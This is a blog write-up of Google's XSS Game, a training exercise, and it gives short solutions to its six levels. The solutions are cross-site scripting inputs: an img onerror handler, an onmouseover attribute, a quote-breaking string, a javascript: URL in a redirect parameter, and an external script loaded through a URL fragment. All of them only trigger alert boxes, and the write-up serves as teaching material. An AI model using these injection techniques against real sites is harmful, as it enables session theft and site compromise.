Google XSS Game Write-Up

What follows is a write-up of a series of vulnerable web applications hosted by Google, XSS Game.

The game has players find and exploit cross-site scripting vulnerabilities in six different web applications.

[*] STATUS: COMPLETED

Level 1: Hello, world of XSS

Mission Objective
Inject a script to pop up a JavaScript alert() in the frame below.

Once you show the alert you will be able to advance to the next level.

Solution:
Input: alert(‘coconut’)

Level 2: Persistence is key

Mission Objective
Inject a script to pop up an alert() in the context of the application.

Note: the application saves your posts so if you sneak in code to execute the alert, this level will be solved every time you reload it.

Solution:
Input: <img src=”http://cookies.c&#8221; onerror=”javascript:alert(‘wut?’)”/>

Level 3: That sinking feeling…

Mission Objective
As before, inject a script to pop up a JavaScript alert() in the app.

Since you can’t enter your payload anywhere in the application, you will have to manually edit the address in the URL bar below.

Solution:
Toggle code
Right-click -> Inspect Element
tabContent
Add to the img src line: onmouseover=”alert(“cookies”)”
Move the mouse over the image

Level 4: Context matters

Mission Objective
Inject a script to pop up a JavaScript alert() in the application.

Solution:
Target code (toggle)
Look at the timer.html source code
1′),alert(‘1 -> Create timer

Level 5: Breaking protocol

Mission Objective
Inject a script to pop up an alert() in the context of the application.

Solution:
Click on Sign Up
# Notice the URL, we can pass parameters
next=javascript:alert(“cookies”);
Click on “Next>>”

Level 6: Follow the 🐇

Mission Objective
Find a way to make the application request an external file which will cause it to execute an alert().

Solution:
Read the index.html
# We can execute a malicious script by pointing to it in the URL
frame#//www.google.com/jsapi?callback=alert -> Go

 

Post-game comments:
The difficulty of the game is very easy. It is more of an introductory game, aimed at beginning security researchers.

Advertisements

One thought on “Google XSS Game Write-Up”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s